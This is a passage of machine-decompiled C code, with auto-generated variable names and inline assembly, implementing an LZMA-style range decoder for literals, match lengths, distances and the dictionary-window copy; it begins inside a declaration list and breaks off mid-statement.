				unsigned int _t525;
				unsigned int _t526;
				unsigned int _t527;
				unsigned int _t528;
				unsigned int _t529;
				unsigned int _t530;
				unsigned int _t531;
				unsigned int _t532;
				unsigned int _t533;
				unsigned int _t534;
				unsigned int _t535;
				unsigned int _t536;
				unsigned int _t537;
				unsigned int _t538;
				unsigned int _t539;
				signed int _t542;
				signed int _t543;
				void* _t544;
				void* _t546;
				void* _t555;
				void* _t556;
				void* _t557;
				void* _t558;
				void* _t559;
				unsigned int _t562;
				unsigned int _t568;
				unsigned int _t571;
				unsigned int _t573;
				unsigned int _t575;
				unsigned int _t584;
				void* _t604;
				unsigned int _t607;
				void* _t622;
				unsigned int _t625;
				unsigned int _t648;
				signed int _t650;
				signed int _t651;
				unsigned int _t656;
				signed int _t660;
				unsigned int _t665;
				signed int _t669;
				unsigned int _t674;
				signed int _t678;
				unsigned int _t683;
				signed int _t687;
				unsigned int _t692;
				signed int _t727;
				void* _t728;
				void* _t729;
				void* _t730;
				void* _t731;
				void* _t732;
				void* _t733;
				unsigned int _t736;
				unsigned int _t739;
				signed int _t743;
				unsigned int _t746;
				unsigned int _t748;
				signed int _t750;
				signed int _t752;
				signed int _t755;
				signed int _t760;
				void* _t763;
				unsigned int _t764;
				signed int _t766;
				void* _t768;
				intOrPtr _t771;
				signed int _t775;
				void* _t776;
				signed int _t780;
				signed int _t783;
				signed char _t786;
				void* _t787;
				unsigned int _t788;
				signed int _t790;
				signed int _t791;
				signed int _t792;
				unsigned int _t795;
				signed int _t798;
				unsigned int _t799;
				signed char* _t806;
				signed char* _t808;
				unsigned int _t812;
				signed int _t815;
				unsigned int _t816;
				void* _t818;
				signed char* _t825;
				signed char* _t827;
				unsigned int _t831;
				signed int _t838;
				signed int _t846;
				signed int _t847;
				signed int _t852;
				signed int _t858;
				signed int _t859;
				signed int _t860;
				signed int _t861;
				signed int _t862;
				signed int _t863;
				signed int _t864;
				unsigned int _t865;
				unsigned int _t870;
				signed int _t872;
				unsigned int _t873;
				unsigned int _t875;
				unsigned int _t877;
				unsigned int _t879;
				unsigned int _t881;
				unsigned int _t883;
				unsigned int _t885;
				signed int _t889;
				signed int _t890;
				signed int _t891;
				signed int _t892;
				signed int _t893;
				unsigned int _t902;
				signed int _t946;
				unsigned int _t948;
				unsigned int _t950;
				signed int _t954;
				signed int _t959;
				signed char* _t961;
				unsigned int _t967;
				unsigned int _t972;
				unsigned int _t977;
				unsigned int _t982;
				unsigned int _t987;
				unsigned int _t990;
				signed int _t996;
				signed int _t999;
				unsigned int _t1001;
				signed char* _t1028;
				unsigned int _t1035;
				unsigned int _t1039;
				unsigned int _t1042;
				unsigned int _t1051;
				unsigned int _t1055;
				unsigned int _t1058;
				unsigned int _t1073;
				signed int _t1076;
				signed short* _t1079;
				unsigned int _t1080;
				signed int _t1083;
				signed short* _t1084;
				unsigned int _t1085;
				signed int _t1088;
				signed short* _t1089;
				unsigned int _t1090;
				signed int _t1093;
				signed short* _t1094;
				unsigned int _t1095;
				signed int _t1098;
				signed short* _t1099;
				unsigned int _t1100;
				signed int _t1103;
				signed short* _t1104;
				unsigned int _t1105;
				signed int _t1111;
				unsigned int _t1114;
				signed char* _t1123;
				unsigned int _t1140;
				unsigned int _t1145;
				unsigned int _t1150;
				unsigned int _t1155;
				unsigned int _t1160;
				unsigned int _t1165;
				unsigned int _t1170;
				unsigned int _t1175;
				signed char* _t1184;
				signed int _t1222;
				unsigned int _t1227;
				unsigned int _t1230;
				unsigned int _t1234;
				unsigned int _t1239;
				signed int _t1245;
				void* _t1249;
				signed int _t1250;
				void* _t1252;
				unsigned int _t1253;
				signed int _t1255;
				unsigned int _t1256;
				unsigned int _t1258;
				unsigned int _t1260;
				unsigned int _t1262;
				void* _t1264;
				signed int _t1267;
				signed int _t1268;
				signed int _t1270;
				signed char* _t1275;
				signed char* _t1281;
				unsigned int _t1284;
				signed int _t1286;
				signed char* _t1292;
				void* _t1298;
				short* _t1299;
				signed int _t1300;
				signed int _t1302;
				signed int _t1304;
				signed int _t1306;
				signed char* _t1308;
				signed int _t1310;
				intOrPtr _t1312;
				char* _t1314;
				signed char* _t1315;
				signed char* _t1317;
				unsigned int _t1320;
				unsigned int _t1325;
				unsigned int _t1330;
				void* _t1350;
				intOrPtr _t1352;
				signed int _t1357;
				signed int _t1358;
				unsigned int _t1361;
				void* _t1365;
				void* _t1366;
				void* _t1367;
				void* _t1368;
				void* _t1369;
				void* _t1370;
				signed char* _t1377;
				char _t1378;
				void* _t1380;

				_t1222 = __esi;
				_t889 = __edx;
				_t495 = __eax;
				while(1) {
					L153:
					_t544 = _t763 + _t763;
					_t764 =  *(_t544 + _t1245 + 0x200) & 0x0000ffff;
					if(_t502 < 0x1000000) {
						_t502 = _t502 << 8;
						_t889 = _t889 << 0x00000008 |  *( *(_t1380 + 0x10)) & 0x000000ff;
						 *(_t1380 + 0x10) =  &(( *(_t1380 + 0x10))[1]);
					}
					_t954 = (_t502 >> 0xb) * _t764;
					if(_t889 >= _t954) {
						_t502 = _t502 - _t954;
						_t889 = _t889 - _t954;
						 *(_t544 + _t1245 + 0x200) = _t764 - (_t764 >> 5);
						_t763 = _t544 + 1;
					} else {
						_t502 = _t954;
						 *(_t544 + _t1245 + 0x200) = (0x800 - _t764 >> 5) + _t764;
						_t763 = _t544;
					}
					if(_t763 < 0x100) {
						continue;
					}
					L159:
					_t766 = _t763 - 0xf0;
					while(1) {
						 *(_t1380 + 0x30) = _t766;
						if( *(_t1380 + 0x14) < 0xc) {
							goto L231;
						}
						L161:
						if(_t766 >= 4) {
							_t766 = 3;
						}
						_t775 = _t766 + 1 << 7;
						_t1253 =  *(_t775 + _t1310 + 2) & 0x0000ffff;
						_t776 = _t775 + _t1310;
						if(_t502 < 0x1000000) {
							_t1028 =  *(_t1380 + 0x10);
							_t502 = _t502 << 8;
							_t889 = _t889 << 0x00000008 |  *_t1028 & 0x000000ff;
							 *(_t1380 + 0x10) =  &(_t1028[1]);
						}
						_t967 = (_t502 >> 0xb) * _t1253;
						if(_t889 >= _t967) {
							_t508 = _t502 - _t967;
							_t889 = _t889 - _t967;
							 *((short*)(_t776 + 2)) = _t1253 - (_t1253 >> 5);
							_t1255 = 3;
						} else {
							_t508 = _t967;
							 *((short*)(_t776 + 2)) = (0x800 - _t1253 >> 5) + _t1253;
							_t1255 = 2;
						}
						_t1315 =  *(_t1380 + 0x10);
						_t556 = _t1255 + _t1255;
						_t1256 =  *(_t556 + _t776) & 0x0000ffff;
						if(_t508 < 0x1000000) {
							_t508 = _t508 << 8;
							_t889 = _t889 << 0x00000008 |  *_t1315 & 0x000000ff;
							_t1315 =  &(_t1315[1]);
							 *(_t1380 + 0x10) = _t1315;
						}
						_t972 = (_t508 >> 0xb) * _t1256;
						if(_t889 >= _t972) {
							_t509 = _t508 - _t972;
							_t889 = _t889 - _t972;
							 *(_t556 + _t776) = _t1256 - (_t1256 >> 5);
							_t556 = _t556 + 1;
						} else {
							_t509 = _t972;
							 *(_t556 + _t776) = (0x800 - _t1256 >> 5) + _t1256;
						}
						_t557 = _t556 + _t556;
						_t1258 =  *(_t557 + _t776) & 0x0000ffff;
						if(_t509 < 0x1000000) {
							_t509 = _t509 << 8;
							_t889 = _t889 << 0x00000008 |  *_t1315 & 0x000000ff;
							_t1315 =  &(_t1315[1]);
							 *(_t1380 + 0x10) = _t1315;
						}
						_t977 = (_t509 >> 0xb) * _t1258;
						if(_t889 >= _t977) {
							_t510 = _t509 - _t977;
							_t889 = _t889 - _t977;
							 *(_t557 + _t776) = _t1258 - (_t1258 >> 5);
							_t557 = _t557 + 1;
						} else {
							_t510 = _t977;
							 *(_t557 + _t776) = (0x800 - _t1258 >> 5) + _t1258;
						}
						_t558 = _t557 + _t557;
						_t1260 =  *(_t558 + _t776) & 0x0000ffff;
						if(_t510 < 0x1000000) {
							_t510 = _t510 << 8;
							_t889 = _t889 << 0x00000008 |  *_t1315 & 0x000000ff;
							_t1315 =  &(_t1315[1]);
							 *(_t1380 + 0x10) = _t1315;
						}
						_t982 = (_t510 >> 0xb) * _t1260;
						if(_t889 >= _t982) {
							_t511 = _t510 - _t982;
							_t889 = _t889 - _t982;
							 *(_t558 + _t776) = _t1260 - (_t1260 >> 5);
							_t558 = _t558 + 1;
						} else {
							_t511 = _t982;
							 *(_t558 + _t776) = (0x800 - _t1260 >> 5) + _t1260;
						}
						_t559 = _t558 + _t558;
						_t1262 =  *(_t559 + _t776) & 0x0000ffff;
						if(_t511 < 0x1000000) {
							_t511 = _t511 << 8;
							_t889 = _t889 << 0x00000008 |  *_t1315 & 0x000000ff;
							_t1315 =  &(_t1315[1]);
							 *(_t1380 + 0x10) = _t1315;
						}
						_t987 = (_t511 >> 0xb) * _t1262;
						if(_t889 >= _t987) {
							_t512 = _t511 - _t987;
							_t889 = _t889 - _t987;
							 *(_t559 + _t776) = _t1262 - (_t1262 >> 5);
							_t559 = _t559 + 1;
						} else {
							_t512 = _t987;
							 *(_t559 + _t776) = (0x800 - _t1262 >> 5) + _t1262;
						}
						_t1264 = _t559 + _t559;
						_t990 =  *(_t1264 + _t776) & 0x0000ffff;
						if(_t512 < 0x1000000) {
							_t512 = _t512 << 8;
							_t889 = _t889 << 0x00000008 |  *_t1315 & 0x000000ff;
							 *(_t1380 + 0x10) =  &(_t1315[1]);
						}
						_t562 = (_t512 >> 0xb) * _t990;
						if(_t889 >= _t562) {
							_t502 = _t512 - _t562;
							_t889 = _t889 - _t562;
							 *(_t1264 + _t776) = _t990 - (_t990 >> 5);
							_t1264 = _t1264 + 1;
						} else {
							_t502 = _t562;
							 *(_t1264 + _t776) = (0x800 - _t990 >> 5) + _t990;
						}
						_t1245 = _t1264 - 0x40;
						if(_t1245 < 4) {
							L228:
							 *(_t1380 + 0x48) =  *(_t1380 + 0x40);
							 *(_t1380 + 0x40) =  *(_t1380 + 0x3c);
							 *(_t1380 + 0x3c) =  *(_t1380 + 0x2c);
							_t436 = _t1245 + 1; // -60
							_t780 = _t436;
							 *(_t1380 + 0x2c) = _t780;
							asm("sbb ecx, ecx");
							 *(_t1380 + 0x14) = (_t780 & 0xfffffffd) + 0xa;
							_t783 =  *(_t1380 + 0x4c);
							if(_t783 == 0) {
								_t783 =  *(_t1380 + 0x28);
							}
							if(_t1245 >= _t783) {
								 *( *((intOrPtr*)(_t1380 + 0x60)) + 0x18) =  *(_t1380 + 0x1c);
								return 1;
							} else {
								goto L231;
							}
						} else {
							_t786 = (_t1245 >> 1) - 1;
							_t1267 = _t1245 & 0x00000001 | 0x00000002;
							if(_t1245 >= 0xe) {
								_t1317 =  *(_t1380 + 0x10);
								_t787 = _t786 - 4;
								do {
									if(_t502 < 0x1000000) {
										_t502 = _t502 << 8;
										_t889 = _t889 << 0x00000008 |  *_t1317 & 0x000000ff;
										_t1317 =  &(_t1317[1]);
									}
									_t502 = _t502 >> 1;
									_t902 = _t889 - _t502;
									_t996 =  ~(_t902 >> 0x1f);
									_t1267 = _t996 + 1 + _t1267 * 2;
									_t889 = _t902 + (_t996 & _t502);
									_t787 = _t787 - 1;
								} while (_t787 != 0);
								_t999 =  *(_t1380 + 0x44);
								_t788 =  *(_t999 + 2) & 0x0000ffff;
								_t1268 = _t1267 << 4;
								 *(_t1380 + 0x10) = _t1317;
								if(_t502 < 0x1000000) {
									_t502 = _t502 << 8;
									_t889 = _t889 << 0x00000008 |  *_t1317 & 0x000000ff;
									_t1317 =  &(_t1317[1]);
									 *(_t1380 + 0x10) = _t1317;
								}
								_t568 = (_t502 >> 0xb) * _t788;
								if(_t889 >= _t568) {
									_t515 = _t502 - _t568;
									_t889 = _t889 - _t568;
									 *(_t999 + 2) = _t788 - (_t788 >> 5);
									_t790 = 3;
								} else {
									_t515 = _t568;
									 *(_t999 + 2) = (0x800 - _t788 >> 5) + _t788;
									_t790 = 2;
								}
								_t571 =  *(_t999 + _t790 * 2) & 0x0000ffff;
								if(_t515 < 0x1000000) {
									_t515 = _t515 << 8;
									_t889 = _t889 << 0x00000008 |  *_t1317 & 0x000000ff;
									 *(_t1380 + 0x10) =  &(( *(_t1380 + 0x10))[1]);
								}
								_t1320 = (_t515 >> 0xb) * _t571;
								if(_t889 >= _t1320) {
									_t516 = _t515 - _t1320;
									_t889 = _t889 - _t1320;
									 *(_t999 + _t790 * 2) = _t571 - (_t571 >> 5);
									_t791 = _t790 + 4;
								} else {
									_t516 = _t1320;
									 *(_t999 + _t790 * 2) = (0x800 - _t571 >> 5) + _t571;
									_t791 = _t790 + 2;
								}
								_t573 =  *(_t999 + _t791 * 2) & 0x0000ffff;
								if(_t516 < 0x1000000) {
									_t516 = _t516 << 8;
									_t889 = _t889 << 0x00000008 |  *( *(_t1380 + 0x10)) & 0x000000ff;
									 *(_t1380 + 0x10) =  &(( *(_t1380 + 0x10))[1]);
								}
								_t1325 = (_t516 >> 0xb) * _t573;
								if(_t889 >= _t1325) {
									_t517 = _t516 - _t1325;
									_t889 = _t889 - _t1325;
									 *(_t999 + _t791 * 2) = _t573 - (_t573 >> 5);
									_t792 = _t791 + 8;
								} else {
									_t517 = _t1325;
									 *(_t999 + _t791 * 2) = (0x800 - _t573 >> 5) + _t573;
									_t792 = _t791 + 4;
								}
								_t575 =  *(_t999 + _t792 * 2) & 0x0000ffff;
								if(_t517 < 0x1000000) {
									_t517 = _t517 << 8;
									_t889 = _t889 << 0x00000008 |  *( *(_t1380 + 0x10)) & 0x000000ff;
									 *(_t1380 + 0x10) =  &(( *(_t1380 + 0x10))[1]);
								}
								_t1330 = (_t517 >> 0xb) * _t575;
								if(_t889 >= _t1330) {
									_t502 = _t517 - _t1330;
									_t889 = _t889 - _t1330;
									 *(_t999 + _t792 * 2) = _t575 - (_t575 >> 5);
								} else {
									_t502 = _t1330;
									 *(_t999 + _t792 * 2) = (0x800 - _t575 >> 5) + _t575;
									_t792 = _t792 - 8;
								}
								_t1245 = _t1268 | _t792;
								if(_t1245 == 0xffffffff) {
									 *(_t1380 + 0x14) =  *(_t1380 + 0x14) - 0xc;
									_t1250 = 0x112;
									L250:
									_t771 =  *((intOrPtr*)(_t1380 + 0x60));
									_t961 =  *(_t1380 + 0x10);
									if(_t502 < 0x1000000) {
										_t502 = _t502 << 8;
										_t889 = _t889 << 0x00000008 |  *_t961 & 0x000000ff;
										_t961 =  &(_t961[1]);
									}
									 *(_t771 + 0x24) = _t889;
									 *(_t771 + 0x20) = _t502;
									 *(_t771 + 0x18) =  *(_t1380 + 0x1c);
									 *(_t771 + 0x28) =  *(_t1380 + 0x28);
									 *(_t771 + 0x1c) = _t961;
									 *(_t771 + 0x30) =  *(_t1380 + 0x2c);
									 *(_t771 + 0x44) = _t1250;
									 *(_t771 + 0x34) =  *(_t1380 + 0x3c);
									 *(_t771 + 0x38) =  *(_t1380 + 0x3c);
									 *(_t771 + 0x3c) =  *(_t1380 + 0x44);
									 *((intOrPtr*)(_t771 + 0x40)) =  *((intOrPtr*)(_t1380 + 0xc));
									return 0;
								} else {
									goto L228;
								}
							} else {
								_t1350 = 1;
								_t1270 = (_t1267 << _t786) + 1;
								do {
									_t1001 =  *( *(_t1380 + 0x44) + _t1270 * 2 - 0xd00) & 0x0000ffff;
									if(_t502 < 0x1000000) {
										_t502 = _t502 << 8;
										_t889 = _t889 << 0x00000008 |  *( *(_t1380 + 0x10)) & 0x000000ff;
										 *(_t1380 + 0x10) =  &(( *(_t1380 + 0x10))[1]);
									}
									_t584 = (_t502 >> 0xb) * _t1001;
									if(_t889 >= _t584) {
										_t502 = _t502 - _t584;
										_t889 = _t889 - _t584;
										_t1350 = _t1350 + _t1350;
										 *( *(_t1380 + 0x44) + _t1270 * 2 - 0xd00) = _t1001 - (_t1001 >> 5);
										_t1270 = _t1270 + _t1350;
									} else {
										_t502 = _t584;
										 *( *(_t1380 + 0x44) + _t1270 * 2 - 0xd00) = (0x800 - _t1001 >> 5) + _t1001;
										_t1270 = _t1270 + _t1350;
										_t1350 = _t1350 + _t1350;
									}
									_t786 = _t786 - 1;
								} while (_t786 != 0);
								_t1245 = _t1270 - _t1350;
								goto L228;
							}
						}
						L253:
						L231:
						_t959 =  *(_t1380 + 0x1c);
						_t546 =  *(_t1380 + 0x30) + 2;
						_t768 =  *((intOrPtr*)(_t1380 + 0x64)) - _t959;
						if(_t768 == 0) {
							 *( *((intOrPtr*)(_t1380 + 0x60)) + 0x18) = _t959;
							return 1;
						} else {
							if(_t768 >= _t546) {
								_t768 = _t546;
							}
							asm("sbb esi, esi");
							 *(_t1380 + 0x28) =  *(_t1380 + 0x28) + _t768;
							 *(_t1380 + 0x30) = _t546 - _t768;
							_t1249 = (_t1245 &  *(_t1380 + 0x38)) -  *(_t1380 + 0x2c) + _t959;
							if(_t768 >  *(_t1380 + 0x38) - _t1249) {
								_t1312 =  *((intOrPtr*)(_t1380 + 0x34));
								do {
									 *((char*)(_t959 + _t1312)) =  *((intOrPtr*)(_t1249 + _t1312));
									_t1249 = _t1249 + 1;
									_t959 = _t959 + 1;
									if(_t1249 ==  *(_t1380 + 0x38)) {
										_t1249 = 0;
									}
									_t768 = _t768 - 1;
								} while (_t768 != 0);
								 *(_t1380 + 0x1c) = _t959;
							} else {
								_t1314 = _t959 +  *((intOrPtr*)(_t1380 + 0x34));
								_t1252 = _t1249 - _t959;
								_t555 = _t768 + _t1314;
								 *(_t1380 + 0x1c) = _t959 + _t768;
								do {
									 *_t1314 =  *((intOrPtr*)(_t1252 + _t1314));
									_t1314 = _t1314 + 1;
								} while (_t1314 != _t555);
								L243:
								while( *(_t1380 + 0x1c) <  *((intOrPtr*)(_t1380 + 0x64)) &&  *(_t1380 + 0x10) <  *((intOrPtr*)(_t1380 + 0x68))) {
									_t1222 =  *(_t1380 + 0x58);
									_t1310 =  *(_t1380 + 0x44);
									_t542 = ( *(_t1380 + 0x28) & _t1222) << 4;
									 *(_t1380 + 0x24) = _t542;
									_t543 = _t542 +  *(_t1380 + 0x14);
									_t736 =  *(_t1310 + _t543 * 2 - 0x200) & 0x0000ffff;
									if(_t495 < 0x1000000) {
										_t1308 =  *(_t1380 + 0x10);
										_t495 = _t495 << 8;
										_t889 = _t889 << 0x00000008 |  *_t1308 & 0x000000ff;
										 *(_t1380 + 0x10) =  &(_t1308[1]);
									}
									_t946 = (_t495 >> 0xb) * _t736;
									if(_t889 >= _t946) {
										 *(_t1310 + _t543 * 2 - 0x200) = _t736 - (_t736 >> 5);
										_t739 =  *(_t1310 + 0x20 +  *(_t1380 + 0x14) * 2) & 0x0000ffff;
										_t496 = _t495 - _t946;
										_t890 = _t889 - _t946;
										if(_t496 < 0x1000000) {
											_t1292 =  *(_t1380 + 0x10);
											_t496 = _t496 << 8;
											_t890 = _t890 << 0x00000008 |  *_t1292 & 0x000000ff;
											 *(_t1380 + 0x10) =  &(_t1292[1]);
										}
										_t1227 = (_t496 >> 0xb) * _t739;
										if(_t890 >= _t1227) {
											_t947 =  *(_t1380 + 0x14);
											_t497 = _t496 - _t1227;
											_t889 = _t890 - _t1227;
											 *((short*)(_t1310 + 0x20 + _t947 * 2)) = _t739 - (_t739 >> 5);
											_t1230 =  *(_t1310 + 0x38 + _t947 * 2) & 0x0000ffff;
											if(_t497 < 0x1000000) {
												_t497 = _t497 << 8;
												_t889 = _t889 << 0x00000008 |  *( *(_t1380 + 0x10)) & 0x000000ff;
												 *(_t1380 + 0x10) =  &(( *(_t1380 + 0x10))[1]);
											}
											_t743 = (_t497 >> 0xb) * _t1230;
											if(_t889 >= _t743) {
												_t498 = _t497 - _t743;
												_t891 = _t889 - _t743;
												 *(_t1310 + 0x38 + _t947 * 2) = _t1230 - (_t1230 >> 5);
												_t746 =  *(_t1310 + 0x50 + _t947 * 2) & 0x0000ffff;
												if(_t498 < 0x1000000) {
													_t1281 =  *(_t1380 + 0x10);
													_t498 = _t498 << 8;
													_t891 = _t891 << 0x00000008 |  *_t1281 & 0x000000ff;
													 *(_t1380 + 0x10) =  &(_t1281[1]);
												}
												_t1234 = (_t498 >> 0xb) * _t746;
												if(_t891 >= _t1234) {
													_t499 = _t498 - _t1234;
													_t892 = _t891 - _t1234;
													 *(_t1310 + 0x50 + _t947 * 2) = _t746 - (_t746 >> 5);
													_t748 =  *(_t1310 + 0x68 + _t947 * 2) & 0x0000ffff;
													if(_t499 < 0x1000000) {
														_t1275 =  *(_t1380 + 0x10);
														_t499 = _t499 << 8;
														_t892 = _t892 << 0x00000008 |  *_t1275 & 0x000000ff;
														 *(_t1380 + 0x10) =  &(_t1275[1]);
													}
													_t1239 = (_t499 >> 0xb) * _t748;
													if(_t892 >= _t1239) {
														_t500 = _t499 - _t1239;
														_t892 = _t892 - _t1239;
														 *(_t1310 + 0x68 + _t947 * 2) = _t748 - (_t748 >> 5);
														_t750 =  *(_t1380 + 0x48);
														 *(_t1380 + 0x48) =  *(_t1380 + 0x40);
													} else {
														_t500 = _t1239;
														_t750 =  *(_t1380 + 0x40);
														 *(_t1310 + 0x68 + _t947 * 2) = (0x800 - _t748 >> 5) + _t748;
													}
													 *(_t1380 + 0x40) =  *(_t1380 + 0x3c);
												} else {
													_t500 = _t1234;
													_t750 =  *(_t1380 + 0x3c);
													 *(_t1310 + 0x50 + _t947 * 2) = (0x800 - _t746 >> 5) + _t746;
												}
												 *(_t1380 + 0x3c) =  *(_t1380 + 0x2c);
												 *(_t1380 + 0x2c) = _t750;
												goto L115;
											} else {
												_t947 =  *(_t1380 + 0x14);
												 *((short*)(_t1310 + 0x38 +  *(_t1380 + 0x14) * 2)) = (0x800 - _t1230 >> 5) + _t1230;
												_t1284 =  *(_t1310 + _t543 * 2 - 0xc00) & 0x0000ffff;
												_t524 = _t743;
												if(_t743 < 0x1000000) {
													_t524 = _t743 << 8;
													_t889 = _t889 << 0x00000008 |  *( *(_t1380 + 0x10)) & 0x000000ff;
													 *(_t1380 + 0x10) =  &(( *(_t1380 + 0x10))[1]);
												}
												_t831 = (_t524 >> 0xb) * _t1284;
												if(_t889 >= _t831) {
													_t500 = _t524 - _t831;
													_t892 = _t889 - _t831;
													_t750 = _t1284 >> 5;
													 *(_t1310 + _t543 * 2 - 0xc00) = _t1284 - _t750;
													L115:
													asm("sbb ecx, ecx");
													_t752 = (_t750 & 0xfffffffd) + 0xb;
													_t1245 = _t1310 - 0xa00;
													goto L116;
												} else {
													_t502 = _t831;
													_t1286 =  *(_t1380 + 0x1c);
													 *(_t1310 + _t543 * 2 - 0xc00) = (0x800 - _t1284 >> 5) + _t1284;
													_t1352 =  *((intOrPtr*)(_t1380 + 0x34));
													asm("sbb ebx, ebx");
													 *(_t1380 + 0x28) =  *(_t1380 + 0x28) + 1;
													_t838 =  *((_t543 &  *(_t1380 + 0x38)) -  *(_t1380 + 0x2c) + _t1286 + _t1352) & 0x000000ff;
													 *(_t1286 + _t1352) = _t838;
													asm("sbb ecx, ecx");
													 *(_t1380 + 0x1c) = _t1286 + 1;
													 *(_t1380 + 0x14) = (_t838 & 0xfffffffe) + 0xb;
													continue;
												}
											}
										} else {
											_t500 = _t1227;
											_t846 =  *(_t1380 + 0x14);
											 *((short*)(_t1310 + 0x20 + _t846 * 2)) = (0x800 - _t739 >> 5) + _t739;
											_t752 = _t846 + 0xc;
											_t1245 = _t1310 - 0x600;
											L116:
											_t948 =  *_t1245 & 0x0000ffff;
											 *(_t1380 + 0x14) = _t752;
											if(_t500 < 0x1000000) {
												_t827 =  *(_t1380 + 0x10);
												_t500 = _t500 << 8;
												_t892 = _t892 << 0x00000008 |  *_t827 & 0x000000ff;
												 *(_t1380 + 0x10) =  &(_t827[1]);
											}
											_t755 = (_t500 >> 0xb) * _t948;
											if(_t892 >= _t755) {
												_t501 = _t500 - _t755;
												_t893 = _t892 - _t755;
												 *_t1245 = _t948 - (_t948 >> 5);
												_t950 =  *(_t1245 + 0x10) & 0x0000ffff;
												if(_t501 < 0x1000000) {
													_t808 =  *(_t1380 + 0x10);
													_t501 = _t501 << 8;
													_t893 = _t893 << 0x00000008 |  *_t808 & 0x000000ff;
													 *(_t1380 + 0x10) =  &(_t808[1]);
												}
												_t760 = (_t501 >> 0xb) * _t950;
												if(_t893 >= _t760) {
													_t502 = _t501 - _t760;
													_t889 = _t893 - _t760;
													 *(_t1245 + 0x10) = _t950 - (_t950 >> 5);
													_t763 = 1;
													do {
														goto L153;
													} while (_t763 < 0x100);
													goto L159;
												} else {
													 *(_t1245 + 0x10) = (0x800 - _t950 >> 5) + _t950;
													_t1245 = _t1245 + 0x10 +  *(_t1380 + 0x24) * 2;
													_t1035 =  *(_t1245 + 2) & 0x0000ffff;
													_t518 = _t760;
													if(_t760 < 0x1000000) {
														_t518 = _t760 << 8;
														_t806 =  *(_t1380 + 0x10);
														_t893 = _t893 << 0x00000008 |  *_t806 & 0x000000ff;
														 *(_t1380 + 0x10) =  &(_t806[1]);
													}
													_t795 = (_t518 >> 0xb) * _t1035;
													if(_t893 >= _t795) {
														_t519 = _t518 - _t795;
														_t893 = _t893 - _t795;
														 *(_t1245 + 2) = _t1035 - (_t1035 >> 5);
														_t798 = 3;
													} else {
														_t519 = _t795;
														 *(_t1245 + 2) = (0x800 - _t1035 >> 5) + _t1035;
														_t798 = 2;
													}
													_t604 = _t798 + _t798;
													_t799 =  *(_t604 + _t1245) & 0x0000ffff;
													if(_t519 < 0x1000000) {
														_t519 = _t519 << 8;
														_t893 = _t893 << 0x00000008 |  *( *(_t1380 + 0x10)) & 0x000000ff;
														 *(_t1380 + 0x10) =  &(( *(_t1380 + 0x10))[1]);
													}
													_t1039 = (_t519 >> 0xb) * _t799;
													if(_t893 >= _t1039) {
														_t520 = _t519 - _t1039;
														_t889 = _t893 - _t1039;
														 *(_t604 + _t1245) = _t799 - (_t799 >> 5);
														_t604 = _t604 + 1;
													} else {
														_t520 = _t1039;
														 *(_t604 + _t1245) = (0x800 - _t799 >> 5) + _t799;
													}
													_t766 = _t604 + _t604;
													_t1042 =  *(_t766 + _t1245) & 0x0000ffff;
													if(_t520 < 0x1000000) {
														_t520 = _t520 << 8;
														_t889 = _t889 << 0x00000008 |  *( *(_t1380 + 0x10)) & 0x000000ff;
														 *(_t1380 + 0x10) =  &(( *(_t1380 + 0x10))[1]);
													}
													_t607 = (_t520 >> 0xb) * _t1042;
													if(_t889 >= _t607) {
														_t502 = _t520 - _t607;
														_t889 = _t889 - _t607;
														 *(_t766 + _t1245) = _t1042 - (_t1042 >> 5);
														_t766 = _t766 + 1;
													} else {
														_t502 = _t607;
														 *(_t766 + _t1245) = (0x800 - _t1042 >> 5) + _t1042;
													}
												}
											} else {
												 *_t1245 = (0x800 - _t948 >> 5) + _t948;
												_t1245 = _t1245 +  *(_t1380 + 0x24) * 2;
												_t1051 =  *(_t1245 + 2) & 0x0000ffff;
												_t521 = _t755;
												if(_t755 < 0x1000000) {
													_t521 = _t755 << 8;
													_t825 =  *(_t1380 + 0x10);
													_t892 = _t892 << 0x00000008 |  *_t825 & 0x000000ff;
													 *(_t1380 + 0x10) =  &(_t825[1]);
												}
												_t812 = (_t521 >> 0xb) * _t1051;
												if(_t892 >= _t812) {
													_t522 = _t521 - _t812;
													_t892 = _t892 - _t812;
													 *(_t1245 + 2) = _t1051 - (_t1051 >> 5);
													_t815 = 3;
												} else {
													_t522 = _t812;
													 *(_t1245 + 2) = (0x800 - _t1051 >> 5) + _t1051;
													_t815 = 2;
												}
												_t622 = _t815 + _t815;
												_t816 =  *(_t622 + _t1245) & 0x0000ffff;
												if(_t522 < 0x1000000) {
													_t522 = _t522 << 8;
													_t892 = _t892 << 0x00000008 |  *( *(_t1380 + 0x10)) & 0x000000ff;
													 *(_t1380 + 0x10) =  &(( *(_t1380 + 0x10))[1]);
												}
												_t1055 = (_t522 >> 0xb) * _t816;
												if(_t892 >= _t1055) {
													_t523 = _t522 - _t1055;
													_t889 = _t892 - _t1055;
													 *(_t622 + _t1245) = _t816 - (_t816 >> 5);
													_t622 = _t622 + 1;
												} else {
													_t523 = _t1055;
													 *(_t622 + _t1245) = (0x800 - _t816 >> 5) + _t816;
												}
												_t818 = _t622 + _t622;
												_t1058 =  *(_t818 + _t1245) & 0x0000ffff;
												if(_t523 < 0x1000000) {
													_t523 = _t523 << 8;
													_t889 = _t889 << 0x00000008 |  *( *(_t1380 + 0x10)) & 0x000000ff;
													 *(_t1380 + 0x10) =  &(( *(_t1380 + 0x10))[1]);
												}
												_t625 = (_t523 >> 0xb) * _t1058;
												if(_t889 >= _t625) {
													_t502 = _t523 - _t625;
													_t889 = _t889 - _t625;
													 *(_t818 + _t1245) = _t1058 - (_t1058 >> 5);
													_t766 = _t818 + 1 - 8;
												} else {
													_t502 = _t625;
													 *(_t818 + _t1245) = (0x800 - _t1058 >> 5) + _t1058;
													_t766 = _t818 - 8;
												}
												while(1) {
													 *(_t1380 + 0x30) = _t766;
													if( *(_t1380 + 0x14) < 0xc) {
														goto L231;
													}
													goto L161;
												}
											}
											 *(_t1380 + 0x30) = _t766;
											if( *(_t1380 + 0x14) < 0xc) {
												goto L231;
											}
										}
									} else {
										 *(_t1310 + _t543 * 2 - 0x200) = (0x800 - _t736 >> 5) + _t736;
										_t525 = _t946;
										_t1298 = _t1310 + 0x280;
										if( *(_t1380 + 0x28) != 0 ||  *(_t1380 + 0x4c) != 0) {
											_t847 =  *(_t1380 + 0x1c);
											if(_t847 == 0) {
												_t847 =  *(_t1380 + 0x38);
											}
											_t543 = (( *(_t847 +  *((intOrPtr*)(_t1380 + 0x34)) - 1) & 0x000000ff) + ( *(_t1380 + 0x28) << 0x00000008) &  *(_t1380 + 0x50)) <<  *(_t1380 + 0x54);
											_t1298 = _t1298 + (_t543 + _t543 * 2) * 2;
										}
										_t852 =  *(_t1380 + 0x14);
